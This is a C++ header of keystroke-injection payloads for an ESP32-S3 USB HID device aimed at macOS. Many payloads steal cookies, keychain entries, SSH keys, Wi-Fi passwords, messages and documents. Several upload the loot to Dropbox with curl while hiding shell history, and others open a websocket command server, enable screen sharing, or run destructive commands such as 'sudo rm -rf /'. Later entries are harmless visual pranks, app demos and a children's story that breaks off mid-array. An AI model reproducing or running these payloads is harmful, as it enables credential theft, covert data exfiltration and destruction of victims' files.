#pragma once

#include <Arduino.h>

struct HidPayloadDef {
  const char *id;
  const char *title;
  uint16_t runtimeSec;
  const char *category;
  const char *platform;
  bool requiresFocusedTextField;
  const char *const *commands;
  uint8_t commandCount;
};

// Generated by tools/generate_hid_payloads.py.
// Source includes all .ino files under payloads/.

static const char *const kHidCmds_browser_cookies[] = {
    "terminal",
    "mkdir -p ~/Documents/exfil",
    "sqlite3 ~/Library/Cookies/com.apple.Safari cookies.db \\\"SELECT * FROM cookies;\\\" > ~/Documents/exfil/safari_cookies.txt 2>/dev/null || echo 'Safari cookies unavailable' > ~/Documents/exfil/safari_cookies.txt",
    "sqlite3 ~/Library/Application\\\\ Support/Google/Chrome/Default/Cookies \\\"SELECT * FROM cookies;\\\" > ~/Documents/exfil/chrome_cookies.txt 2>/dev/null || echo 'Chrome cookies unavailable' > ~/Documents/exfil/chrome_cookies.txt",
    "echo 'Cookies exported' && ls -la ~/Documents/exfil/",
};

static const char *const kHidCmds_clipboard_stealer[] = {
    "terminal",
    "mkdir -p ~/Documents/exfil",
    "pbpaste > ~/Documents/exfil/clipboard.txt",
    "cat ~/Documents/exfil/clipboard.txt",
};

static const char *const kHidCmds_keychain_dump[] = {
    "terminal",
    "mkdir -p ~/Documents/exfil",
    "security dump-keychain > ~/Documents/exfil/keychain_dump.txt 2>&1",
    "security find-internet-password -g > ~/Documents/exfil/keychain_passwords.txt 2>&1",
    "ls -la ~/Documents/exfil/",
};

static const char *const kHidCmds_ssh_keys[] = {
    "terminal",
    "mkdir -p ~/Documents/exfil/ssh_keys",
    "cp -r ~/.ssh/* ~/Documents/exfil/ssh_keys/ 2>/dev/null || echo 'No SSH keys found' > ~/Documents/exfil/ssh_keys/status.txt",
    "ls -la ~/Documents/exfil/ssh_keys/",
};

static const char *const kHidCmds_wifi_passwords[] = {
    "terminal",
    "mkdir -p ~/Documents/exfil",
    "networksetup -listallnetworkservices > ~/Documents/exfil/wifi_ssids.txt",
    "for network in $(networksetup -listallnetworkservices | grep -v '*'); do password=$(security find-generic-password -wa \\\"$network\\\" 2>/dev/null); echo \\\"$network: $password\\\" >> ~/Documents/exfil/wifi_passwords.txt; done",
    "cat ~/Documents/exfil/wifi_passwords.txt",
};

static const char *const kHidCmds_bluetooth_on[] = {
    "bluetooth File Exchange",
};

static const char *const kHidCmds_cookies_2_dropbox[] = {
    "Finder",
    "/Users/<SYSTEM USERNAME HERE>/Library",
    "cook",
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " echo 'cd ~/Desktop && zip -r cookies.zip cookies && curl -X POST https://content.dropboxapi.com/2/files/upload -H \\\"Authorization: Bearer <YOUR API KEY HERE>\\\" -H \\\"Dropbox-API-Arg: {\\\\\\\"path\\\\\\\": \\\\\\\"/cookies.zip\\\\\\\",\\\\\\\"mode\\\\\\\": \\\\\\\"add\\\\\\\",\\\\\\\"autorename\\\\\\\": true,\\\\\\\"mute\\\\\\\": false}\\\" -H \\\"Content-Type: application/octet-stream\\\" --data-binary @cookies.zip' > upload.sh",
    " chmod +x upload.sh",
    " nohup ./upload.sh >/dev/null 2>&1 &",
    " rm -r ~/Desktop/cookies",
    " rm upload.sh",
    " rm -r ~/Desktop/cookies.zip",
    " CLEAR",
    " rm ~/.bash_history",
};

static const char *const kHidCmds_copypasta[] = {
    "terminal",
    "mkdir ~/.copypasta",
    "cp -R ~/Desktop/* ~/.copypasta/",
};

static const char *const kHidCmds_darkstorm_bruteforce_ip[] = {
    "terminal",
    "nmap -p 1-1000 -T4 -Pn 13.371.118.34",
    "nikto -h 13.371.118.34 -p <Open port # goes here>",
    "/Applications/OWASP\\\\ ZAP.app/Contents/Java/zap.sh -cmd -quickurl http://13.371.118.34 -quickout ~/Desktop/quick_scan_results.html",
    "tshark -i en0 -w ~/Desktop/capture.pcap",
    "gobuster dir -u http://13.371.118.34 -w ~/Desktop/common.txt -t 50 -q",
};

static const char *const kHidCmds_delete_pasta[] = {
    "terminal",
    "rm -rf ~/.copypasta",
};

static const char *const kHidCmds_docs_desktop_to_dropbox[] = {
    "Terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " mkdir -p ~/Desktop/Backup/Desktop",
    " mkdir -p ~/Desktop/Backup/Documents",
    " cp -R ~/Documents/* ~/Desktop/Backup/Documents/",
    " cp -R ~/Desktop/* ~/Desktop/Backup/Desktop/",
    " echo 'cd ~/Desktop/Backup && zip -r backup.zip . && curl -X POST https://content.dropboxapi.com/2/files/upload -H \\\"Authorization: Bearer <API access token here>\\\" -H \\\"Dropbox-API-Arg: {\\\\\\\"path\\\\\\\": \\\\\\\"/Backup/backup.zip\\\\\\\",\\\\\\\"mode\\\\\\\": \\\\\\\"add\\\\\\\",\\\\\\\"autorename\\\\\\\": true,\\\\\\\"mute\\\\\\\": false}\\\" -H \\\"Content-Type: application/octet-stream\\\" --data-binary @backup.zip' > upload.sh",
    " chmod +x upload.sh",
    " nohup ./upload.sh >/dev/null 2>&1 &",
    " rm upload.sh",
    " rm -r ~/Desktop/backup",
    " rm backup.zip",
    " clear",
};

static const char *const kHidCmds_doomsday_desktop_delete[] = {
    "terminal.app",
    "rm -rf ~/Desktop/*",
};

static const char *const kHidCmds_dropbox_2_desktop_boom[] = {
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " cd ~/Desktop",
    " echo 'ACCESS_TOKEN=\\\"<API ACCESS TOKEN HERE>\\\"; DOWNLOAD_URL=\\\"<DROPBOX URL HERE>\\\"; SAVE_PATH=\\\"$HOME/Desktop/<CLICK ME.mp4>\\\"; curl -L -o \\\"$SAVE_PATH\\\" --header \\\"Authorization: Bearer $ACCESS_TOKEN\\\" \\\"$DOWNLOAD_URL\\\"' > download.sh",
    " chmod +x download.sh",
    " ./download.sh",
};

static const char *const kHidCmds_eapol_handshake_2_dropbox[] = {
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " networksetup -setairportpower en0 off",
    " tshark -i en0 -w ~/Desktop/captured.pcap &",
    " networksetup -setairportpower en0 on",
    " pkill -f tshark",
    " echo 'cd ~/Desktop && zip -r \\\"CapturedHandshake.zip\\\" captured.pcap && curl -X POST https://content.dropboxapi.com/2/files/upload -H \\\"Authorization: Bearer <API ACCESS TOKEN>\\\" -H \\\"Dropbox-API-Arg: {\\\\\\\"path\\\\\\\": \\\\\\\"/Backup/CapturedHandshake.zip\\\\\\\",\\\\\\\"mode\\\\\\\": \\\\\\\"add\\\\\\\",\\\\\\\"autorename\\\\\\\": true,\\\\\\\"mute\\\\\\\": false}\\\" -H \\\"Content-Type: application/octet-stream\\\" --data-binary @\\\"CapturedHandshake.zip\\\"' > upload.sh",
    " chmod +x upload.sh",
    " nohup ./upload.sh >/dev/null 2>&1 &",
    " rm ~/Desktop/captured.pcap",
    " rm ~/Desktop/CapturedHandshake.zip",
    " rm upload.sh",
};

static const char *const kHidCmds_file_load_tester[] = {
    "terminal",
    "cd ~/Desktop && for i in {1..100}; do dd if=/dev/random of=file$i bs=1m count=30; done",
};

static const char *const kHidCmds_icloud_to_dropbox[] = {
    "Finder",
    "/Users/<SYSTEM USERNAME HERE>/Library/mobile",
    "do",
    "terminal",
    "STRING echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " echo 'cd ~/Desktop && zip -r Documents.zip Documents && curl -X POST https://content.dropboxapi.com/2/files/upload -H \\\"Authorization: Bearer <YOUR API KEY HERE>\\\" -H \\\"Dropbox-API-Arg: {\\\\\\\"path\\\\\\\": \\\\\\\"/Documents.zip\\\\\\\",\\\\\\\"mode\\\\\\\": \\\\\\\"add\\\\\\\",\\\\\\\"autorename\\\\\\\": true,\\\\\\\"mute\\\\\\\": false}\\\" -H \\\"Content-Type: application/octet-stream\\\" --data-binary @Documents.zip' > upload.sh",
    " chmod +x upload.sh",
    " ./upload.sh",
    " rm upload.sh",
    " rm -r ~/Desktop/Documents.zip",
    " CLEAR",
};

static const char *const kHidCmds_imessage_2_dropbox[] = {
    "Finder",
    "/Users/<SYSTEM USERNAME HERE>/Library/Messages/",
    "at",
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " echo 'cd ~/Desktop && zip -r attachments.zip Attachments && curl -X POST https://content.dropboxapi.com/2/files/upload -H \\\"Authorization: Bearer <YOUR API KEY HERE>\\\" -H \\\"Dropbox-API-Arg: {\\\\\\\"path\\\\\\\": \\\\\\\"/attachments.zip\\\\\\\",\\\\\\\"mode\\\\\\\": \\\\\\\"add\\\\\\\",\\\\\\\"autorename\\\\\\\": true,\\\\\\\"mute\\\\\\\": false}\\\" -H \\\"Content-Type: application/octet-stream\\\" --data-binary @attachments.zip' > upload.sh",
    " chmod +x upload.sh",
    " nohup ./upload.sh >/dev/null 2>&1 &",
    " rm upload.sh",
    " CLEAR",
};

static const char *const kHidCmds_infinte_dialog_box[] = {
    "terminal",
    "nohup osascript -e 'repeat' -e 'set dialogResult to button returned of (display dialog \\\"I'\\\"'\\\"'ll Never Leave\\\" buttons {\\\"Option 1\\\", \\\"Option 2\\\", \\\"Option 3\\\"} default button 1)' -e 'end repeat' >/dev/null 2>&1 &",
};

static const char *const kHidCmds_load_tester_mega_folder_create[] = {
    "terminal",
    "mkdir ~/Desktop/FunFolders{1..400}",
};

static const char *const kHidCmds_macos_website_redirect[] = {
    "terminal",
    "open -a Safari 'Enter URL/Website here'",
};

static const char *const kHidCmds_neversleep[] = {
    "TERMINAL",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    "NOHUP caffeinate -s &",
};

static const char *const kHidCmds_remote_shell[] = {
    "Terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " mkdir ~/.phantom_ws && cd ~/.phantom_ws",
    " echo 'import asyncio\\\\nimport websockets\\\\nimport subprocess\\\\n\\\\nasync def execute_command(websocket, path):\\\\n    async for message in websocket:\\\\n        cmd = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\\\\n        cmd_output = cmd.stdout.read() + cmd.stderr.read()\\\\n        await websocket.send(cmd_output.decode())\\\\n\\\\nstart_server = websockets.serve(execute_command, \\\"localhost\\\", 8765)\\\\n\\\\nasyncio.get_event_loop().run_until_complete(start_server)\\\\nasyncio.get_event_loop().run_forever()' > server.py",
    " nohup python3 server.py > /dev/null 2>&1 &",
    " clear",
};

static const char *const kHidCmds_sys_file_delete[] = {
    "Terminal",
    "echo \\\"Hello! Initiating system takeover... Deleting All Files.....\\\"",
    "sudo rm -rf /",
    "echo \\\"All your files have been deleted. Goodbye!\\\"",
    "sudo shutdown -h now",
};

static const char *const kHidCmds_system_disruption_loop[] = {
    "terminal",
    "nohup sh -c 'while true; do say \\\"Warning: System compromised. Initiating disruption.\\\"; done' >/dev/null 2>&1 &",
};

static const char *const kHidCmds_browser_history[] = {
    "terminal",
    "mkdir -p ~/Documents/exfil/browser_history",
    "sqlite3 ~/Library/Safari/History.db \\\"SELECT visit_time, title, url FROM history_items JOIN history_visits ON history_items.id = history_visits.history_item_id ORDER BY visit_time DESC LIMIT 100;\\\" > ~/Documents/exfil/browser_history/safari_history.txt 2>/dev/null",
    "sqlite3 ~/Library/Application\\\\ Support/Google/Chrome/Default/History \\\"SELECT last_visit_time, title, url FROM urls ORDER BY last_visit_time DESC LIMIT 100;\\\" > ~/Documents/exfil/browser_history/chrome_history.txt 2>/dev/null",
    "ls -la ~/Documents/exfil/browser_history/",
};

static const char *const kHidCmds_desktop_exfil[] = {
    "terminal",
    "mkdir -p ~/Documents/exfil",
    "cd ~/Documents/exfil && tar -czf desktop_backup_$(date +%Y%m%d).tar.gz ~/Desktop/* 2>/dev/null || echo 'Empty desktop' > desktop_backup_$(date +%Y%m%d).txt",
    "ls -lah ~/Documents/exfil/",
};

static const char *const kHidCmds_notes_exfil[] = {
    "terminal",
    "mkdir -p ~/Documents/exfil/notes",
    "osascript -e 'tell application \\\"Notes\\\" to get name of every note' > ~/Documents/exfil/notes/notes_titles.txt",
    "cp -r ~/Library/Group\\\\ Containers/group.com.apple.notes/* ~/Documents/exfil/notes/ 2>/dev/null || echo 'Notes access failed' > ~/Documents/exfil/notes/status.txt",
    "ls -la ~/Documents/exfil/notes/",
};

static const char *const kHidCmds_screenshare_toggle[] = {
    "terminal",
    "sudo defaults write /Library/Preferences/com.apple.remotedesktop.plist enabled -bool true",
    "sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on",
    "echo 'Screen sharing enabled'",
};

static const char *const kHidCmds_screenshot_capture[] = {
    "terminal",
    "mkdir -p ~/Desktop/screenshots",
    "screencapture -x ~/Desktop/screenshots/screenshot_$(date +%Y%m%d_%H%M%S).png",
    "ls -la ~/Desktop/screenshots/",
};

static const char *const kHidCmds_app_chaos_montage[] = {
    "echo 'SCENE 1/3: APP CASCADE'",
    "bash -lc 'apps=(\"Safari\" \"Calculator\" \"Chess\" \"Preview\" \"Music\"); for round in 1 2 3; do for app in \"${apps[@]}\"; do open -a \"$app\"; sleep 1.3; done; done; sleep 8' # reel_apps",
    "echo 'SCENE 3/3: MONTAGE ENDED'",
    "echo 'PANIC RESET: pkill -f reel_ || true; killall Terminal >/dev/null 2>&1 || true'",
};

static const char *const kHidCmds_ascii_chaos_console[] = {
    "clear",
    "echo 'SCENE 1/3: BOOTSTRAP ASCII GRID'",
    "echo 'module[vision] module[relay] module[crypto] module[signal] -> preflight' ",
    "bash -lc 'printf \"\\033[1;36m\"; echo \":: uplink handshake accepted\"; echo \":: rendering glyph stream\"; printf \"\\033[0;32m\"; chars=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()[]{}<>?/|\\\\-_=+~\"; for i in $(seq 1 200); do line=\"\"; for j in $(seq 1 84); do idx=$((RANDOM % ${#chars})); line+=\"${chars:$idx:1}\"; done; printf \"%s\\n\" \"$line\"; if [ $((i % 20)) -eq 0 ]; then printf \"\\033[1;33m[STATUS] relay_%02d synced | cache=%02d%% | entropy=OK\\033[0m\\n\" \"$((RANDOM%99+1))\" \"$((RANDOM%100))\"; fi; sleep 0.08; done; printf \"\\033[1;92mSIMULATION COMPLETE - VISUALS ONLY\\033[0m\\n\"; sleep 8' # reel_ascii",
    "echo 'SCENE 3/3: DROP COMPLETE'",
    "echo 'PANIC RESET: pkill -f reel_ || true; killall Terminal >/dev/null 2>&1 || true'",
};

static const char *const kHidCmds_autotype_drama_scene[] = {
    "echo 'SCENE 1/3: MESSAGE BUILD'",
    "bash -lc 'printf \"%s\\n\" \"[LOG ENTRY]\" \"I thought the machine was haunted.\" \"Then I realized it was choreography.\" \"No breach. No malware. Just timing, typing, and camera angles.\" \"When the beat drops, hit record.\" > ~/Desktop/reel_drama_scene.txt; open -a TextEdit ~/Desktop/reel_drama_scene.txt; sleep 12' # reel_drama",
    "echo 'PANIC RESET: pkill -f reel_ || true; killall Terminal >/dev/null 2>&1 || true'",
};

static const char *const kHidCmds_beat_sync_terminal[] = {
    "clear",
    "echo 'SCENE 1/3: 8-16-32 BAR VISUAL PULSE'",
    "bash -lc 'for bars in 8 16 32; do for i in $(seq 1 $bars); do printf \"[BAR %02d/%02d] ########################\\r\" \"$i\" \"$bars\"; sleep 0.22; done; printf \"\\n\"; done; echo \"DROP COMPLETE\"; sleep 12' # reel_beat",
    "echo 'PANIC RESET: pkill -f reel_ || true; killall Terminal >/dev/null 2>&1 || true'",
};

static const char *const kHidCmds_cinematic_fake_breach[] = {
    "clear",
    "echo 'SCENE 1/3: ACCESS PHASE'",
    "bash -lc 'printf \"\\033[32m\"; for i in $(seq 1 26); do printf \"[%02d] injecting visual payload into relay_%02d ... OK\\n\" \"$i\" \"$((RANDOM%97+1))\"; sleep 0.35; done; printf \"\\n\\033[1;92mSIMULATION COMPLETE - NO REAL ACCESS PERFORMED\\033[0m\\n\"; sleep 10'",
    "echo 'PANIC RESET: pkill -f reel_ || true; killall Terminal >/dev/null 2>&1 || true'",
};

static const char *const kHidCmds_example_hello_world[] = {
    "echo 'Hello from ESP32-S3 HID'",
    "echo 'Add your commands here'",
};

static const char *const kHidCmds_glitch_desktop_takeover[] = {
    "echo 'SCENE 1/3: VISUAL GLITCH WAVE'",
    "bash -lc 'for i in $(seq 1 12); do osascript -e \"tell application \\\"System Events\\\" to set dark mode of appearance preferences to true\" >/dev/null 2>&1; sleep 0.4; osascript -e \"tell application \\\"System Events\\\" to set dark mode of appearance preferences to false\" >/dev/null 2>&1; sleep 0.4; done'",
    "open -a 'Calculator'; sleep 1; open -a 'Chess'; sleep 1; open -a 'Music'; sleep 1; open -a 'Preview'",
    "echo 'SCENE 3/3: RESET PATH READY'",
    "echo 'PANIC RESET: pkill -f reel_ || true; killall Terminal >/dev/null 2>&1 || true'",
};

static const char *const kHidCmds_matrix_rain_studio[] = {
    "clear",
    "echo 'SCENE 1/3: MATRIX RAIN'",
    "bash -lc 'printf \"\\033[0;32m\"; for i in $(seq 1 220); do tr -dc \"A-F0-9\" </dev/urandom | head -c 64; printf \"\\n\"; sleep 0.18; done; printf \"\\033[0m\"; sleep 8' # reel_matrix",
    "echo 'PANIC RESET: pkill -f reel_ || true; killall Terminal >/dev/null 2>&1 || true'",
};

static const char *const kHidCmds_notification_storm_lite[] = {
    "echo 'SCENE 1/3: NOTIFICATION BURST'",
    "bash -lc 'for i in $(seq 1 18); do osascript -e \"display notification \\\"Signal spike $i/18\\\" with title \\\"REEL MODE\\\" subtitle \\\"Visual simulation\\\"\"; sleep 0.35; done; sleep 10' # reel_notify",
    "echo 'SCENE 3/3: BURST FINISHED'",
    "echo 'PANIC RESET: pkill -f reel_ || true; killall Terminal >/dev/null 2>&1 || true'",
};

static const char *const kHidCmds_reveal_and_reset[] = {
    "pkill -f reel_ >/dev/null 2>&1 || true",
    "killall Calculator Chess Music Preview Safari >/dev/null 2>&1 || true",
    "clear",
    "echo '========================================='",
    "echo 'REVEAL: THIS WAS A CHOREOGRAPHED REEL'",
    "echo 'No persistence, no credential access, no stealth.'",
    "echo 'UNDO COMPLETE. YOU ARE BACK TO NORMAL.'",
    "echo '========================================='",
};

static const char *const kHidCmds_rickroll_macos_safari[] = {
    "open -a Safari 'https://www.youtube.com/watch?v=oHg5SJYRHA0'",
    "sleep 10",
    "osascript -e 'tell application \"Safari\" to activate'",
    "sleep 6",
};

static const char *const kHidCmds_live_chart_crypto[] = {
    "TERMINAL",
    "curl rate.sx/btc",
};

static const char *const kHidCmds_app_carousel_demo[] = {
    "KEY:CMD+SPACE",
    "WAIT:1100",
    "TEXT:notes",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1500",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:safari",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1500",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:photos",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1500",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:music",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1500",
    "KEY:CMD+H",
};

static const char *const kHidCmds_app_switch_demo[] = {
    "KEY:CMD+TAB",
    "WAIT:500",
    "KEY:CMD+TAB",
    "WAIT:500",
    "KEY:CMD+TAB",
    "WAIT:500",
    "KEY:CMD+H",
};

static const char *const kHidCmds_card_stack_demo[] = {
    "KEY:CMD+SPACE",
    "WAIT:1100",
    "TEXT:photos",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:music",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:calendar",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:notes",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
};

static const char *const kHidCmds_digit_storm[] = {
    "TEXT:1234567890",
    "WAIT:100",
    "TEXT:0987654321",
    "WAIT:100",
    "TEXT:13579",
    "WAIT:100",
    "TEXT:24680",
    "WAIT:100",
    "KEY:ENTER",
    "WAIT:200",
};

static const char *const kHidCmds_focus_tools_demo[] = {
    "KEY:CMD+SPACE",
    "WAIT:1100",
    "TEXT:clock",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:weather",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:settings",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:maps",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
};

static const char *const kHidCmds_home_loop_demo[] = {
    "KEY:CMD+SPACE",
    "WAIT:1100",
    "TEXT:safari",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:900",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:settings",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:900",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:photos",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
};

static const char *const kHidCmds_little_hakr_cyber_hero_story[] = {
    "TEXT:Little Hakr lived on the top floor of a narrow building where the rain tapped the windows like a metronome and the old city lights hummed through the night. He was small enough that people often underestimated him, but he never minded, because the truth was that Little Hakr liked being underestimated. It gave him room to listen. He could hear the soft pulse of the neighborhood routers, the faint chatter of public kiosks, the sleepy sigh of a library server, and the warm static of a hundred ordinary lives trying to connect to one another.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Every morning he wore the same blue hoodie with a stitched lightning bolt on the sleeve, and every morning he carried a pocket notebook full of careful drawings, tiny maps, and reminders written in a neat hand. Little Hakr did not call himself a hacker in the dramatic way movies did. He called himself a fixer. If a teacher could not print attendance, if a neighbor could not reach their doctor portal, if a museum display glitched just as children arrived, he would quietly show up, ask permission, and make the system behave. He believed the best cyber heroes did not show off. They helped, documented, and left things calmer than they found them.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:One evening, while walking past the ferry terminal, Little Hakr noticed that the departure board was flickering. Routes vanished and returned, names scrambled, and tired commuters began to crowd around it with the particular frustration that only technology can make. He knelt beside the display, checked the power, checked the cable, and then listened. Not with a stethoscope, but with his own quiet attention. He had learned that machines often told the truth if you gave them enough patience. The board was not broken in a dramatic way. It was confused. A timing issue, a bad update, a little stale cache. He fixed it, and the ferries returned to their proper names as if nothing had happened.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:The crowd cheered, though Little Hakr tried to slip away before they could make a scene. A child in a yellow coat noticed him first and asked if he was a wizard. Little Hakr smiled and said that he was only good at listening. The child considered this, then declared that listening must be the most underrated superpower in the world. Little Hakr wrote that sentence in his notebook because it felt true enough to keep forever. On the walk home, he passed glowing storefronts, a late bus, and the corner bakery still warm from its last tray of bread, and he thought about how many tiny systems held a city together.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:At home he spread his tools across the kitchen table: a cable tester, a tiny flashlight, a spare battery bank, a lint-free cloth, and three pens that all wrote differently. He used them for different kinds of problems. One pen for steps, one for warnings, one for ideas that seemed too odd to ignore. Beside the tools sat his oldest treasure, a secondhand tablet with a cracked corner and a battery that still held on if you treated it kindly. Little Hakr used it to practice coding puzzles, sketch diagrams, and write down the names of people who deserved a little extra care.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:The next day brought the kind of storm that turned traffic signals dull and made every window look like a silver mirror. Somewhere downtown, the public library lost its wireless connection. Parents could not renew books, students could not print assignments, and the evening story hour had paused in the middle of a sentence. Little Hakr arrived with permission from the librarian, who knew him by name and trusted his calm. He checked the access point, then the switch, then the cable run under the counter. The problem was a loose connector that had been tugged just enough to cause misery and not enough to be obvious. He fixed it, taped the label back in place, and watched the network bloom back to life.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:The librarians thanked him with tea, crackers, and a bookmark shaped like a moon. One of them said the city should issue him a cape. Little Hakr laughed and said capes were poor practical choices in weather like this. He preferred a hood and good shoes. Still, when he stepped back outside, he imagined a cape made of network diagrams and kindly reminders. Not for drama. For morale. He liked the idea that courage could be lightweight, colorful, and slightly ridiculous, as long as it was used to help someone who had been stuck.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:That night a retired systems engineer named Bea invited him to her workshop above a bicycle repair shop. Bea had hands that looked like they had built and repaired half the city. She taught Little Hakr the old rule: never touch a system you do not understand, and never understand a system without writing down what you learn. They drank ginger tea while screens glowed softly around them. Bea showed him how to trace a signal from edge to edge, how to look for the smallest clue in a log, and how to stop when a fix became a guess. Little Hakr loved that lesson because it sounded like wisdom wearing work boots.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Together they discovered that a municipal archive server had been behaving strangely, not because of sabotage, but because it had quietly drifted out of sync after a power wobble. The error messages were noisy, but the truth was simple. The clock had slipped, the job scheduler had become grumpy, and a backup script was trying to argue with yesterday. Little Hakr grinned. This was the kind of mystery he liked. No one was a villain. The system just needed care. He reset the clock, stabilized the job queue, and documented each step so the next person would not have to guess.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Bea watched him work and said that a cyber hero is not the one who makes the loudest entrance. It is the one who reduces panic. Little Hakr wrote that down too. He began to see his town as a woven thing, a fabric of bus stops, clinics, school halls, street lamps, small businesses, and families all depending on invisible threads. He liked the feeling of making those threads stronger. He liked the way a fixed login page could save a student from embarrassment or a repaired kiosk could save a senior from standing in the rain. Every simple repair felt like returning a lost key to the correct pocket.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:By the end of the week, people began leaving notes for Little Hakr in the community center inbox. One note said the after-school music room was working again. Another said the clinic printer was no longer throwing errors. Another thanked the mysterious person who had quietly restored the touchscreen at the transit desk. He never claimed the notes. He let the thanks belong to the whole neighborhood. Still, when he read them, he felt a small bright warmth in his chest, the kind that comes from useful work done without ceremony. Heroism, he thought, should feel like a door opening rather than a spotlight shining.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:On a Saturday morning, the city prepared for its Lantern Parade, a yearly celebration when the bridges were lined with paper lights and the waterfront reflected them like a second sky. Just before dusk, the projection rig that coordinated the parade began to drift off rhythm. Colors lagged, patterns skipped, and the first test sequence stuttered across the plaza. Little Hakr was already nearby helping volunteers set up public charging stations, so he rolled up his sleeves and took a look. The controller was not failing completely. It was suffering from a bad timing chain and a messy configuration left behind by a rushed update.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:He asked for the change log, traced the current settings, and compared them with the archived setup from last year. He did not rush. He did not blame the previous team. He simply followed the evidence until the right alignment emerged. Then he made the smallest possible correction, tested again, and watched the lantern patterns sweep cleanly across the square. The crowd gasped, then laughed with relief. Children pointed. Musicians tuned their instruments. The parade began, and the city glowed in careful waves of amber, blue, and white. Little Hakr stood at the edge of the plaza and let the light wash over his shoes.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:After the parade, a teenager named Mira found him near the hot chocolate cart and asked how he learned to stay so calm. Little Hakr said calm was just a habit made of many smaller habits: breathe before you click, read before you act, ask before you assume, and never let embarrassment push you into a bad decision. Mira nodded like she had been given a secret map. Little Hakr showed her how to read a simple network diagram and how to note the difference between a device problem and a user problem. She left with a smile, and later she would teach two friends what he had taught her.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:That was the real shape of Little Hakr's work. He did not just repair systems. He passed on a style of care. He made people more confident in the tools around them. When someone understood their own device a little better, they feared it a little less. When they feared it less, they used it more wisely. When they used it wisely, the whole city became easier to live in. He liked this chain of effects. It was less flashy than a movie chase scene, but it lasted longer, and it multiplied kindly.",
    "WAIT:90",
    "KEY:ENTER",
